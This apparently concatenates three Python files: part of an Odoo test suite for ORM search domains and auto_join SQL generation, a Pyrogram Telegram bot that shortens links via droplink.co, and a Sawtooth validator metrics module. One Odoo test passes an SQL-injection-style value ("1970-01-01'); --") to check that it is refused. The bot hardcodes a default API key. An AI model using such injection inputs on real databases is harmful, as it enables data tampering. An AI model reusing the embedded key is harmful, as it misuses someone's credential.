self.assertEqual(res_10, res_11)
res_12 = Currency.search([('rate_ids', '!=', False)])
self.assertEqual(res_10, res_12)
res_13 = Currency.search([('rate_ids', 'not in', [])])
self.assertEqual(res_10, res_13)
def test_20_expression_parse(self):
# TDE note: those tests have been added when refactoring the expression.parse() method.
# They come in addition to the already existing tests; maybe some tests
# will be a bit redundant
Users = self.env['res.users']
# Create users
a = Users.create({'name': 'test_A', 'login': 'test_A'})
b1 = Users.create({'name': 'test_B', 'login': 'test_B'})
b2 = Users.create({'name': 'test_B2', 'login': 'test_B2', 'parent_id': b1.partner_id.id})
# Test1: simple inheritance
users = Users.search([('name', 'like', 'test')])
self.assertEqual(users, a + b1 + b2, 'searching through inheritance failed')
users = Users.search([('name', '=', 'test_B')])
self.assertEqual(users, b1, 'searching through inheritance failed')
# Test2: inheritance + relational fields
users = Users.search([('child_ids.name', 'like', 'test_B')])
self.assertEqual(users, b1, 'searching through inheritance failed')
# Special =? operator mean "is equal if right is set, otherwise always True"
users = Users.search([('name', 'like', 'test'), ('parent_id', '=?', False)])
self.assertEqual(users, a + b1 + b2, '(x =? False) failed')
users = Users.search([('name', 'like', 'test'), ('parent_id', '=?', b1.partner_id.id)])
self.assertEqual(users, b2, '(x =? id) failed')
def test_30_normalize_domain(self):
norm_domain = domain = ['&', (1, '=', 1), ('a', '=', 'b')]
self.assertEqual(norm_domain, expression.normalize_domain(domain), "Normalized domains should be left untouched")
domain = [('x', 'in', ['y', 'z']), ('a.v', '=', 'e'), '|', '|', ('a', '=', 'b'), '!', ('c', '>', 'd'), ('e', '!=', 'f'), ('g', '=', 'h')]
norm_domain = ['&', '&', '&'] + domain
self.assertEqual(norm_domain, expression.normalize_domain(domain), "Non-normalized domains should be properly normalized")
def test_40_negating_long_expression(self):
source = ['!', '&', ('user_id', '=', 4), ('partner_id', 'in', [1, 2])]
expect = ['|', ('user_id', '!=', 4), ('partner_id', 'not in', [1, 2])]
self.assertEqual(expression.distribute_not(source), expect,
"distribute_not on expression applied wrongly")
pos_leaves = [[('a', 'in', [])], [('d', '!=', 3)]]
neg_leaves = [[('a', 'not in', [])], [('d', '=', 3)]]
source = expression.OR([expression.AND(pos_leaves)] * 1000)
expect = source
self.assertEqual(expression.distribute_not(source), expect,
"distribute_not on long expression without negation operator should not alter it")
source = ['!'] + source
expect = expression.AND([expression.OR(neg_leaves)] * 1000)
self.assertEqual(expression.distribute_not(source), expect,
"distribute_not on long expression applied wrongly")
def test_accent(self):
if not self.registry.has_unaccent:
return
Company = self.env['res.company']
helene = Company.create({'name': u'Hélène'})
self.assertEqual(helene, Company.search([('name','ilike','Helene')]))
self.assertEqual(helene, Company.search([('name','ilike','hélène')]))
self.assertNotIn(helene, Company.search([('name','not ilike','Helene')]))
self.assertNotIn(helene, Company.search([('name','not ilike','hélène')]))
def test_like_wildcards(self):
# check that =like/=ilike expressions are working on an untranslated field
Partner = self.env['res.partner']
partners = Partner.search([('name', '=like', 'W_od_C_rn_r')])
self.assertTrue(len(partners) == 1, "Must match one partner (Wood Corner)")
partners = Partner.search([('name', '=ilike', 'G%')])
self.assertTrue(len(partners) >= 1, "Must match one partner (Gemini Furniture)")
# check that =like/=ilike expressions are working on translated field
Country = self.env['res.country']
countries = Country.search([('name', '=like', 'Ind__')])
self.assertTrue(len(countries) == 1, "Must match India only")
countries = Country.search([('name', '=ilike', 'z%')])
self.assertTrue(len(countries) == 2, "Must match only countries with names starting with Z (currently 2)")
def test_translate_search(self):
Country = self.env['res.country']
belgium = self.env.ref('base.be')
domains = [
[('name', '=', 'Belgium')],
[('name', 'ilike', 'Belgi')],
[('name', 'in', ['Belgium', 'Care Bears'])],
]
for domain in domains:
countries = Country.search(domain)
self.assertEqual(countries, belgium)
def test_long_table_alias(self):
# To test the 64 characters limit for table aliases in PostgreSQL
self.patch_order('res.users', 'partner_id')
self.patch_order('res.partner', 'commercial_partner_id,company_id,name')
self.patch_order('res.company', 'parent_id')
self.env['res.users'].search([('name', '=', 'test')])
@mute_logger('odoo.sql_db')
def test_invalid(self):
""" verify that invalid expressions are refused, even for magic fields """
Country = self.env['res.country']
with self.assertRaises(ValueError):
Country.search([('does_not_exist', '=', 'foo')])
with self.assertRaises(ValueError):
Country.search([('create_date', '>>', 'foo')])
with self.assertRaises(psycopg2.DataError):
Country.search([('create_date', '=', "1970-01-01'); --")])
def test_active(self):
# testing for many2many field with category office and active=False
Partner = self.env['res.partner']
vals = {
'name': 'OpenERP Test',
'active': False,
'category_id': [(6, 0, [self.ref("base.res_partner_category_0")])],
'child_ids': [(0, 0, {'name': 'address of OpenERP Test', 'country_id': self.ref("base.be")})],
}
Partner.create(vals)
partner = Partner.search([('category_id', 'ilike', 'vendor'), ('active', '=', False)])
self.assertTrue(partner, "Record not Found with category vendor and active False.")
# testing for one2many field with country Belgium and active=False
partner = Partner.search([('child_ids.country_id','=','Belgium'),('active','=',False)])
self.assertTrue(partner, "Record not Found with country Belgium and active False.")
def test_lp1071710(self):
""" Check that we can exclude translated fields (bug lp:1071710) """
# first install french language
self.env['ir.translation'].load_module_terms(['base'], ['fr_FR'])
self.env.ref('base.res_partner_2').country_id = self.env.ref('base.be')
# actual test
Country = self.env['res.country']
be = self.env.ref('base.be')
not_be = Country.with_context(lang='fr_FR').search([('name', '!=', 'Belgique')])
self.assertNotIn(be, not_be)
# indirect search via m2o
Partner = self.env['res.partner']
deco_addict = Partner.search([('name', '=', 'Deco Addict')])
not_be = Partner.search([('country_id', '!=', 'Belgium')])
self.assertNotIn(deco_addict, not_be)
not_be = Partner.with_context(lang='fr_FR').search([('country_id', '!=', 'Belgique')])
self.assertNotIn(deco_addict, not_be)
def test_or_with_implicit_and(self):
# Check that when using expression.OR on a list of domains with at least one
# implicit '&' the returned domain is the expected result.
# from #24038
d1 = [('foo', '=', 1), ('bar', '=', 1)]
d2 = ['&', ('foo', '=', 2), ('bar', '=', 2)]
expected = ['|', '&', ('foo', '=', 1), ('bar', '=', 1),
'&', ('foo', '=', 2), ('bar', '=', 2)]
self.assertEqual(expression.OR([d1, d2]), expected)
def test_proper_combine_unit_leaves(self):
# test that unit leaves (TRUE_LEAF, FALSE_LEAF) are properly handled in specific cases
false = expression.FALSE_DOMAIN
true = expression.TRUE_DOMAIN
normal = [('foo', '=', 'bar')]
# OR with single FALSE_LEAF
expr = expression.OR([false])
self.assertEqual(expr, false)
# OR with multiple FALSE_LEAF
expr = expression.OR([false, false])
self.assertEqual(expr, false)
# OR with FALSE_LEAF and a normal leaf
expr = expression.OR([false, normal])
self.assertEqual(expr, normal)
# OR with AND of single TRUE_LEAF and normal leaf
expr = expression.OR([expression.AND([true]), normal])
self.assertEqual(expr, true)
# AND with single TRUE_LEAF
expr = expression.AND([true])
self.assertEqual(expr, true)
# AND with multiple TRUE_LEAF
expr = expression.AND([true, true])
self.assertEqual(expr, true)
# AND with TRUE_LEAF and normal leaves
expr = expression.AND([true, normal])
self.assertEqual(expr, normal)
# AND with OR with single FALSE_LEAF and normal leaf
expr = expression.AND([expression.OR([false]), normal])
self.assertEqual(expr, false)
class TestAutoJoin(TransactionCase):
def setUp(self):
super(TestAutoJoin, self).setUp()
# Mock BaseModel._where_calc(), to be able to proceed to some tests about generated expression
self._reinit_mock()
BaseModel_where_calc = BaseModel._where_calc
def _where_calc(model, *args, **kwargs):
""" Mock `_where_calc` to be able to test its results. Store them
into some internal variable for latter processing. """
query = BaseModel_where_calc(model, *args, **kwargs)
self.query_list.append(query)
return query
self.patch(BaseModel, '_where_calc', _where_calc)
def _reinit_mock(self):
self.query_list = []
def test_auto_join(self):
unaccent = expression.get_unaccent_wrapper(self.cr)
# Get models
partner_obj = self.env['res.partner']
state_obj = self.env['res.country.state']
bank_obj = self.env['res.partner.bank']
# Get test columns
def patch_auto_join(model, fname, value):
self.patch(model._fields[fname], 'auto_join', value)
def patch_domain(model, fname, value):
self.patch(model._fields[fname], 'domain', value)
# Get country/state data
country_us = self.env['res.country'].search([('code', 'like', 'US')], limit=1)
states = self.env['res.country.state'].search([('country_id', '=', country_us.id)], limit=2)
# Create demo data: partners and bank object
p_a = partner_obj.create({'name': 'test__A', 'state_id': states[0].id})
p_b = partner_obj.create({'name': 'test__B', 'state_id': states[1].id})
p_aa = partner_obj.create({'name': 'test__AA', 'parent_id': p_a.id, 'state_id': states[0].id})
p_ab = partner_obj.create({'name': 'test__AB', 'parent_id': p_a.id, 'state_id': states[1].id})
p_ba = partner_obj.create({'name': 'test__BA', 'parent_id': p_b.id, 'state_id': states[0].id})
b_aa = bank_obj.create({'acc_number': '123', 'acc_type': 'bank', 'partner_id': p_aa.id})
b_ab = bank_obj.create({'acc_number': '456', 'acc_type': 'bank', 'partner_id': p_ab.id})
b_ba = bank_obj.create({'acc_number': '789', 'acc_type': 'bank', 'partner_id': p_ba.id})
# --------------------------------------------------
# Test1: basics about the attribute
# --------------------------------------------------
patch_auto_join(partner_obj, 'category_id', True)
with self.assertRaises(NotImplementedError):
partner_obj.search([('category_id.name', '=', 'foo')])
# --------------------------------------------------
# Test2: one2many
# --------------------------------------------------
name_test = '12'
# Do: one2many without _auto_join
self._reinit_mock()
partners = partner_obj.search([('bank_ids.sanitized_acc_number', 'like', name_test)])
# Test result
self.assertEqual(partners, p_aa,
"_auto_join off: ('bank_ids.sanitized_acc_number', 'like', '..'): incorrect result")
# Test produced queries
self.assertEqual(len(self.query_list), 2,
"_auto_join off: ('bank_ids.sanitized_acc_number', 'like', '..') should produce 2 queries (1 in res_partner_bank, 1 on res_partner)")
sql_query = self.query_list[0].get_sql()
self.assertIn('res_partner_bank', sql_query[0],
"_auto_join off: ('bank_ids.sanitized_acc_number', 'like', '..') first query incorrect main table")
expected = "%s like %s" % (unaccent('"res_partner_bank"."sanitized_acc_number"::text'), unaccent('%s'))
self.assertIn(expected, sql_query[1],
"_auto_join off: ('bank_ids.sanitized_acc_number', 'like', '..') first query incorrect where condition")
self.assertEqual(['%' + name_test + '%'], sql_query[2],
"_auto_join off: ('bank_ids.sanitized_acc_number', 'like', '..') first query incorrect parameter")
sql_query = self.query_list[1].get_sql()
self.assertIn('res_partner', sql_query[0],
"_auto_join off: ('bank_ids.sanitized_acc_number', 'like', '..') second query incorrect main table")
self.assertIn('"res_partner"."id" in (%s)', sql_query[1],
"_auto_join off: ('bank_ids.sanitized_acc_number', 'like', '..') second query incorrect where condition")
self.assertIn(p_aa.id, sql_query[2],
"_auto_join off: ('bank_ids.sanitized_acc_number', 'like', '..') second query incorrect parameter")
# Do: cascaded one2many without _auto_join
self._reinit_mock()
partners = partner_obj.search([('child_ids.bank_ids.id', 'in', [b_aa.id, b_ba.id])])
# Test result
self.assertEqual(partners, p_a + p_b,
"_auto_join off: ('child_ids.bank_ids.id', 'in', [..]): incorrect result")
# Test produced queries
self.assertEqual(len(self.query_list), 3,
"_auto_join off: ('child_ids.bank_ids.id', 'in', [..]) should produce 3 queries (1 in res_partner_bank, 2 on res_partner)")
# Do: one2many with _auto_join
patch_auto_join(partner_obj, 'bank_ids', True)
self._reinit_mock()
partners = partner_obj.search([('bank_ids.sanitized_acc_number', 'like', name_test)])
# Test result
self.assertEqual(partners, p_aa,
"_auto_join on: ('bank_ids.sanitized_acc_number', 'like', '..') incorrect result")
# Test produced queries
self.assertEqual(len(self.query_list), 1,
"_auto_join on: ('bank_ids.sanitized_acc_number', 'like', '..') should produce 1 query")
sql_query = self.query_list[0].get_sql()
self.assertIn('"res_partner"', sql_query[0],
"_auto_join on: ('bank_ids.sanitized_acc_number', 'like', '..') query incorrect main table")
self.assertIn('"res_partner_bank" as "res_partner__bank_ids"', sql_query[0],
"_auto_join on: ('bank_ids.sanitized_acc_number', 'like', '..') query incorrect join")
expected = "%s like %s" % (unaccent('"res_partner__bank_ids"."sanitized_acc_number"::text'), unaccent('%s'))
self.assertIn(expected, sql_query[1],
"_auto_join on: ('bank_ids.sanitized_acc_number', 'like', '..') query incorrect where condition")
self.assertIn('"res_partner"."id"="res_partner__bank_ids"."partner_id"', sql_query[1],
"_auto_join on: ('bank_ids.sanitized_acc_number', 'like', '..') query incorrect join condition")
self.assertIn('%' + name_test + '%', sql_query[2],
"_auto_join on: ('bank_ids.sanitized_acc_number', 'like', '..') query incorrect parameter")
# Do: one2many with _auto_join, test final leaf is an id
self._reinit_mock()
bank_ids = [b_aa.id, b_ab.id]
partners = partner_obj.search([('bank_ids.id', 'in', bank_ids)])
# Test result
self.assertEqual(partners, p_aa + p_ab,
"_auto_join on: ('bank_ids.id', 'in', [..]) incorrect result")
# Test produced queries
self.assertEqual(len(self.query_list), 1,
"_auto_join on: ('bank_ids.id', 'in', [..]) should produce 1 query")
sql_query = self.query_list[0].get_sql()
self.assertIn('"res_partner"', sql_query[0],
"_auto_join on: ('bank_ids.id', 'in', [..]) query incorrect main table")
self.assertIn('"res_partner__bank_ids"."id" in (%s,%s)', sql_query[1],
"_auto_join on: ('bank_ids.id', 'in', [..]) query incorrect where condition")
self.assertLessEqual(set(bank_ids), set(sql_query[2]),
"_auto_join on: ('bank_ids.id', 'in', [..]) query incorrect parameter")
# Do: 2 cascaded one2many with _auto_join, test final leaf is an id
patch_auto_join(partner_obj, 'child_ids', True)
self._reinit_mock()
bank_ids = [b_aa.id, b_ba.id]
partners = partner_obj.search([('child_ids.bank_ids.id', 'in', bank_ids)])
# Test result
self.assertEqual(partners, p_a + p_b,
"_auto_join on: ('child_ids.bank_ids.id', 'not in', [..]): incorrect result")
        # Test produced queries
self.assertEqual(len(self.query_list), 1,
"_auto_join on: ('child_ids.bank_ids.id', 'in', [..]) should produce 1 query")
sql_query = self.query_list[0].get_sql()
self.assertIn('"res_partner"', sql_query[0],
"_auto_join on: ('child_ids.bank_ids.id', 'in', [..]) incorrect main table")
self.assertIn('"res_partner" as "res_partner__child_ids"', sql_query[0],
"_auto_join on: ('child_ids.bank_ids.id', 'in', [..]) query incorrect join")
self.assertIn('"res_partner_bank" as "res_partner__child_ids__bank_ids"', sql_query[0],
"_auto_join on: ('child_ids.bank_ids.id', 'in', [..]) query incorrect join")
self.assertIn('"res_partner__child_ids__bank_ids"."id" in (%s,%s)', sql_query[1],
"_auto_join on: ('child_ids.bank_ids.id', 'in', [..]) query incorrect where condition")
self.assertIn('"res_partner"."id"="res_partner__child_ids"."parent_id"', sql_query[1],
"_auto_join on: ('child_ids.bank_ids.id', 'in', [..]) query incorrect join condition")
self.assertIn('"res_partner__child_ids"."id"="res_partner__child_ids__bank_ids"."partner_id"', sql_query[1],
"_auto_join on: ('child_ids.bank_ids.id', 'in', [..]) query incorrect join condition")
self.assertLessEqual(set(bank_ids), set(sql_query[2][-2:]),
"_auto_join on: ('child_ids.bank_ids.id', 'in', [..]) query incorrect parameter")
# --------------------------------------------------
# Test3: many2one
# --------------------------------------------------
name_test = 'US'
# Do: many2one without _auto_join
self._reinit_mock()
partners = partner_obj.search([('state_id.country_id.code', 'like', name_test)])
# Test result: at least our added data + demo data
self.assertLessEqual(p_a + p_b + p_aa + p_ab + p_ba, partners,
"_auto_join off: ('state_id.country_id.code', 'like', '..') incorrect result")
# Test produced queries
self.assertEqual(len(self.query_list), 3,
"_auto_join off: ('state_id.country_id.code', 'like', '..') should produce 3 queries (1 on res_country, 1 on res_country_state, 1 on res_partner)")
# Do: many2one with 1 _auto_join on the first many2one
patch_auto_join(partner_obj, 'state_id', True)
self._reinit_mock()
partners = partner_obj.search([('state_id.country_id.code', 'like', name_test)])
# Test result: at least our added data + demo data
self.assertLessEqual(p_a + p_b + p_aa + p_ab + p_ba, partners,
"_auto_join on for state_id: ('state_id.country_id.code', 'like', '..') incorrect result")
# Test produced queries
self.assertEqual(len(self.query_list), 2,
"_auto_join on for state_id: ('state_id.country_id.code', 'like', '..') should produce 2 query")
sql_query = self.query_list[0].get_sql()
self.assertIn('"res_country"', sql_query[0],
"_auto_join on for state_id: ('state_id.country_id.code', 'like', '..') query 1 incorrect main table")
expected = "%s like %s" % (unaccent('"res_country"."code"::text'), unaccent('%s'))
self.assertIn(expected, sql_query[1],
"_auto_join on for state_id: ('state_id.country_id.code', 'like', '..') query 1 incorrect where condition")
self.assertEqual(['%' + name_test + '%'], sql_query[2],
"_auto_join on for state_id: ('state_id.country_id.code', 'like', '..') query 1 incorrect parameter")
sql_query = self.query_list[1].get_sql()
self.assertIn('"res_partner"', sql_query[0],
"_auto_join on for state_id: ('state_id.country_id.code', 'like', '..') query 2 incorrect main table")
self.assertIn('"res_country_state" as "res_partner__state_id"', sql_query[0],
"_auto_join on for state_id: ('state_id.country_id.code', 'like', '..') query 2 incorrect join")
self.assertIn('"res_partner__state_id"."country_id" in (%s)', sql_query[1],
"_auto_join on for state_id: ('state_id.country_id.code', 'like', '..') query 2 incorrect where condition")
self.assertIn('"res_partner"."state_id"="res_partner__state_id"."id"', sql_query[1],
"_auto_join on for state_id: ('state_id.country_id.code', 'like', '..') query 2 incorrect join condition")
# Do: many2one with 1 _auto_join on the second many2one
patch_auto_join(partner_obj, 'state_id', False)
patch_auto_join(state_obj, 'country_id', True)
self._reinit_mock()
partners = partner_obj.search([('state_id.country_id.code', 'like', name_test)])
# Test result: at least our added data + demo data
self.assertLessEqual(p_a + p_b + p_aa + p_ab + p_ba, partners,
"_auto_join on for country_id: ('state_id.country_id.code', 'like', '..') incorrect result")
# Test produced queries
self.assertEqual(len(self.query_list), 2,
"_auto_join on for country_id: ('state_id.country_id.code', 'like', '..') should produce 2 query")
# -- first query
sql_query = self.query_list[0].get_sql()
self.assertIn('"res_country_state"', sql_query[0],
"_auto_join on for country_id: ('state_id.country_id.code', 'like', '..') query 1 incorrect main table")
self.assertIn('"res_country" as "res_country_state__country_id"', sql_query[0],
"_auto_join on for country_id: ('state_id.country_id.code', 'like', '..') query 1 incorrect join")
expected = "%s like %s" % (unaccent('"res_country_state__country_id"."code"::text'), unaccent('%s'))
self.assertIn(expected, sql_query[1],
"_auto_join on for country_id: ('state_id.country_id.code', 'like', '..') query 1 incorrect where condition")
self.assertIn('"res_country_state"."country_id"="res_country_state__country_id"."id"', sql_query[1],
"_auto_join on for country_id: ('state_id.country_id.code', 'like', '..') query 1 incorrect join condition")
self.assertEqual(['%' + name_test + '%'], sql_query[2],
"_auto_join on for country_id: ('state_id.country_id.code', 'like', '..') query 1 incorrect parameter")
# -- second query
sql_query = self.query_list[1].get_sql()
self.assertIn('"res_partner"', sql_query[0],
"_auto_join on for country_id: ('state_id.country_id.code', 'like', '..') query 2 incorrect main table")
self.assertIn('"res_partner"."state_id" in', sql_query[1],
"_auto_join on for country_id: ('state_id.country_id.code', 'like', '..') query 2 incorrect where condition")
# Do: many2one with 2 _auto_join
patch_auto_join(partner_obj, 'state_id', True)
patch_auto_join(state_obj, 'country_id', True)
self._reinit_mock()
partners = partner_obj.search([('state_id.country_id.code', 'like', name_test)])
# Test result: at least our added data + demo data
self.assertLessEqual(p_a + p_b + p_aa + p_ab + p_ba, partners,
"_auto_join on: ('state_id.country_id.code', 'like', '..') incorrect result")
# Test produced queries
self.assertEqual(len(self.query_list), 1,
"_auto_join on: ('state_id.country_id.code', 'like', '..') should produce 1 query")
sql_query = self.query_list[0].get_sql()
self.assertIn('"res_partner"', sql_query[0],
"_auto_join on: ('state_id.country_id.code', 'like', '..') query incorrect main table")
self.assertIn('"res_country_state" as "res_partner__state_id"', sql_query[0],
"_auto_join on: ('state_id.country_id.code', 'like', '..') query incorrect join")
self.assertIn('"res_country" as "res_partner__state_id__country_id"', sql_query[0],
"_auto_join on: ('state_id.country_id.code', 'like', '..') query incorrect join")
expected = "%s like %s" % (unaccent('"res_partner__state_id__country_id"."code"::text'), unaccent('%s'))
self.assertIn(expected, sql_query[1],
"_auto_join on: ('state_id.country_id.code', 'like', '..') query incorrect where condition")
self.assertIn('"res_partner"."state_id"="res_partner__state_id"."id"', sql_query[1],
"_auto_join on: ('state_id.country_id.code', 'like', '..') query incorrect join condition")
self.assertIn('"res_partner__state_id"."country_id"="res_partner__state_id__country_id"."id"', sql_query[1],
"_auto_join on: ('state_id.country_id.code', 'like', '..') query incorrect join condition")
self.assertIn('%' + name_test + '%', sql_query[2],
"_auto_join on: ('state_id.country_id.code', 'like', '..') query incorrect parameter")
# --------------------------------------------------
# Test4: domain attribute on one2many fields
# --------------------------------------------------
patch_auto_join(partner_obj, 'child_ids', True)
patch_auto_join(partner_obj, 'bank_ids', True)
patch_domain(partner_obj, 'child_ids', lambda self: ['!', ('name', '=', self._name)])
patch_domain(partner_obj, 'bank_ids', [('sanitized_acc_number', 'like', '2')])
# Do: 2 cascaded one2many with _auto_join, test final leaf is an id
self._reinit_mock()
partners = partner_obj.search(['&', (1, '=', 1), ('child_ids.bank_ids.id', 'in', [b_aa.id, b_ba.id])])
# Test result: at least one of our added data
self.assertLessEqual(p_a, partners,
"_auto_join on one2many with domains incorrect result")
self.assertFalse((p_ab + p_ba) & partners,
"_auto_join on one2many with domains incorrect result")
        # Test produced queries: check that the field domains are effectively applied
sql_query = self.query_list[0].get_sql()
expected = "%s like %s" % (unaccent('"res_partner__child_ids__bank_ids"."sanitized_acc_number"::text'), unaccent('%s'))
self.assertIn(expected, sql_query[1],
"_auto_join on one2many with domains incorrect result")
# TDE TODO: check first domain has a correct table name
self.assertIn('"res_partner__child_ids"."name" = %s', sql_query[1],
"_auto_join on one2many with domains incorrect result")
patch_domain(partner_obj, 'child_ids', lambda self: [('name', '=', '__%s' % self._name)])
self._reinit_mock()
partners = partner_obj.search(['&', (1, '=', 1), ('child_ids.bank_ids.id', 'in', [b_aa.id, b_ba.id])])
        # Test result: no record matches
self.assertFalse(partners,
"_auto_join on one2many with domains incorrect result")
# ----------------------------------------
# Test5: result-based tests
# ----------------------------------------
patch_auto_join(partner_obj, 'bank_ids', False)
patch_auto_join(partner_obj, 'child_ids', False)
patch_auto_join(partner_obj, 'state_id', False)
patch_auto_join(partner_obj, 'parent_id', False)
patch_auto_join(state_obj, 'country_id', False)
patch_domain(partner_obj, 'child_ids', [])
patch_domain(partner_obj, 'bank_ids', [])
# Do: ('child_ids.state_id.country_id.code', 'like', '..') without _auto_join
self._reinit_mock()
partners = partner_obj.search([('child_ids.state_id.country_id.code', 'like', name_test)])
# Test result: at least our added data + demo data
self.assertLessEqual(p_a + p_b, partners,
"_auto_join off: ('child_ids.state_id.country_id.code', 'like', '..') incorrect result")
# Test produced queries
self.assertEqual(len(self.query_list), 4,
"_auto_join off: ('child_ids.state_id.country_id.code', 'like', '..') number of queries incorrect")
# Do: ('child_ids.state_id.country_id.code', 'like', '..') with _auto_join
patch_auto_join(partner_obj, 'child_ids', True)
patch_auto_join(partner_obj, 'state_id', True)
patch_auto_join(state_obj, 'country_id', True)
self._reinit_mock()
partners = partner_obj.search([('child_ids.state_id.country_id.code', 'like', name_test)])
# Test result: at least our added data + demo data
self.assertLessEqual(p_a + p_b, partners,
"_auto_join on: ('child_ids.state_id.country_id.code', 'like', '..') incorrect result")
# Test produced queries
self.assertEqual(len(self.query_list), 1,
"_auto_join on: ('child_ids.state_id.country_id.code', 'like', '..') number of queries incorrect")
|
py | b40036974ff865ec934a085a02683bae2445dd45 | from os import environ
import aiohttp
from pyrogram import Client, filters
API_ID = environ.get('API_ID')
API_HASH = environ.get('API_HASH')
BOT_TOKEN = environ.get('BOT_TOKEN')
API_KEY = environ.get('API_KEY', '5fd20df0c4db85798dd4f5ff3d03e3606a94f98b')
bot = Client('gplink bot',
api_id=API_ID,
api_hash=API_HASH,
bot_token=BOT_TOKEN,
workers=50,
sleep_threshold=10)
@bot.on_message(filters.command('start') & filters.private)
async def start(bot, message):
await message.reply(
f"**Hi {message.chat.first_name}!**\n\n"
"I'm GPlink bot. Just send me link and get short link")
@bot.on_message(filters.regex(r'https?://[^\s]+') & filters.private)
async def link_handler(bot, message):
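    # `filters.regex` stores its match objects on `message.matches`;
    # group(0) below is therefore the full matched URL.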
link = message.matches[0].group(0)
try:
short_link = await get_shortlink(link)
await message.reply(f'{short_link}', quote=True)
except Exception as e:
await message.reply(f'Error: {e}', quote=True)
async def get_shortlink(link):
url = 'https://droplink.co/api'
params = {'api': API_KEY, 'url': link}
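    # Assumption: droplink.co answers with JSON along the lines of
    # {"status": "success", "shortenedUrl": "https://droplink.co/xxxx"};
    # the "shortenedUrl" key used below would need adjusting if the API differs.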
async with aiohttp.ClientSession() as session:
async with session.get(url, params=params, raise_for_status=True) as response:
data = await response.json()
return data["shortenedUrl"]
bot.run()
|
py | b40036d76ab13c57e5bc9c32f84cfb273f945415 | # Copyright 2018 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ------------------------------------------------------------------------------
"""
Metric types
------------
Currently, three types of metrics are supported: gauge, counter, and timer.
- Gauge: Used to record a value that changes arbitrarily.
- Counter: Used to record a value that increments or decrements.
- Timer: Used to record the duration of tasks.
To add more metric types, corresponding mock metrics must be added to the end
of metrics.py as these mocks are used when metric reporting is disabled.
API Usage
---------
To create a new metric, a handle to the metrics collector must be created at
the beginning of the module with:
from sawtooth_validator import metrics
COLLECTOR = metrics.get_collector(__name__)
This creates a new handle which will tag all metrics created with the handle
using the full module name. To create a new metric, call the function with the
corresponding name:
important_value_gauge = COLLECTOR.gauge("important_value")
The above creates a metric named
`"sawtooth_validator.module_name.important_value"` and tags it with the
hostname where the validator is running. If metrics reporting for this metric
is disabled, a mock object is returned which implements the same API as the
regular metric object. **Note:** Mock objects do not maintain state.
If the metric is part of a class, the instance should be passed in when the
metric is created like so:
important_instance_value_counter = COLLECTOR.counter(
"important_instance_value", instance=self)
This automatically adds the class name to the metric name.
Additionally, a metrics reporting level can be set and additional tags can be
added when it is created using the `level` and `tags` parameters:
important_timer = COLLECTOR.timer(
"important_timer",
instance=self,
level=metrics.DEBUG,
tags={
"name": self.name,
"pid": os.getpid(),
"instance": id(self),
})
Tags should be used to separate metrics from multiple sources that are
collected in the same place. For example, `InstrumentedThreadPoolExecutor` uses
tags to distinguish threadpool metrics by the threadpool's name. While you
could also separate out these metrics by instance id, adding a name tag makes
interpreting the metrics much easier.
"""
import platform
DEBUG = 10
INFO = 20
PERF = 30
DEFAULT = INFO
def init_metrics(level=None, registry=None):
"""
Initialize metrics reporting with the given level and registry. This
should be called before get_collector().
"""
MetricsCollector.set_instance(level, registry)
def get_collector(module_name=None):
"""
Get a handle to the metrics collector.
"""
return MetricsCollectorHandle(module_name)
class MetricsCollector:
__instance = None
@classmethod
def set_instance(cls, level=None, registry=None):
cls.__instance = cls(level, registry)
@classmethod
def get_instance(cls, level=None, registry=None):
if cls.__instance is None:
cls.set_instance(level, registry)
return cls.__instance
def __init__(self, level=None, registry=None):
if level is None:
level = DEFAULT
self._level = level
self._noop_registry = NoOpMetricsRegistry()
self._registry = registry
self._base_tags = (
("host", platform.node()),
)
def gauge(self, identifier, level, instance=None, tags=None):
if self._registry is None or self._disabled(identifier, level):
return self._noop_registry.gauge(identifier)
return self._registry.gauge(
self._join(identifier, instance, tags))
def counter(self, identifier, level, instance=None, tags=None):
if self._registry is None or self._disabled(identifier, level):
return self._noop_registry.counter(identifier)
return self._registry.counter(
self._join(identifier, instance, tags))
def timer(self, identifier, level, instance=None, tags=None):
if self._registry is None or self._disabled(identifier, level):
return self._noop_registry.timer(identifier)
return self._registry.timer(
self._join(identifier, instance, tags))
# Private methods
def _disabled(self, identifier, level):
"""Check if the metric is enabled based on the level."""
return level < self._level
def _join(self, identifier, instance=None, tags=None):
"""
Join the identifier list with periods ".", combine the arbitrary tags
        with the base tags, convert the tags to "tag=value" format, and then
        join everything with ",".
"""
tag_list = []
if tags is not None:
tag_list.extend(tags.items())
tag_list.extend(self._base_tags)
return ".".join(identifier) + "," + ",".join(
"{}={}".format(k, v)
for k, v in tag_list
)
class MetricsCollectorHandle:
def __init__(self, module_name):
if module_name is not None:
module_name = module_name.split(".")[-1]
self._module_name = module_name
def gauge(self, metric_name, level=DEFAULT, instance=None, tags=None):
return MetricsCollector.get_instance().gauge(
identifier=self._create_identifier(metric_name, instance),
level=level,
instance=instance,
tags=tags)
def counter(self, metric_name, level=DEFAULT, instance=None, tags=None):
return MetricsCollector.get_instance().counter(
identifier=self._create_identifier(metric_name, instance),
level=level,
instance=instance,
tags=tags)
def timer(self, metric_name, level=DEFAULT, instance=None, tags=None):
return MetricsCollector.get_instance().timer(
identifier=self._create_identifier(metric_name, instance),
level=level,
instance=instance,
tags=tags)
def _create_identifier(self, metric_name, instance=None):
identifier = [metric_name]
if instance is not None:
identifier.insert(0, instance.__class__.__name__)
if self._module_name is not None:
identifier.insert(0, self._module_name)
return identifier
class NoOpMetricsRegistry:
def __init__(self):
self._noop_gauge = NoOpGauge()
self._noop_counter = NoOpCounter()
self._noop_timer = NoOpTimer()
def gauge(self, identifier):
return self._noop_gauge
def counter(self, identifier):
return self._noop_counter
def timer(self, identifier):
return self._noop_timer
class NoOpGauge:
def set_value(self, *args, **kwargs):
pass
def get_value(self, *args, **kwargs):
return 0
class NoOpCounter:
def inc(self, *args, **kwargs):
pass
def dec(self, *args, **kwargs):
pass
class NoOpTimer:
def __init__(self):
self._ctx = NoOpTimerContext()
def time(self):
return self._ctx
class NoOpTimerContext():
def __enter__(self):
pass
def __exit__(self, exception_type, exception_value, traceback):
pass
def stop(self, *args, **kwargs):
pass
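# Illustrative usage sketch, not part of the original module. The registry is
# assumed to be any object exposing gauge/counter/timer (the validator wires in
# something like a pyformance MetricsRegistry at startup):
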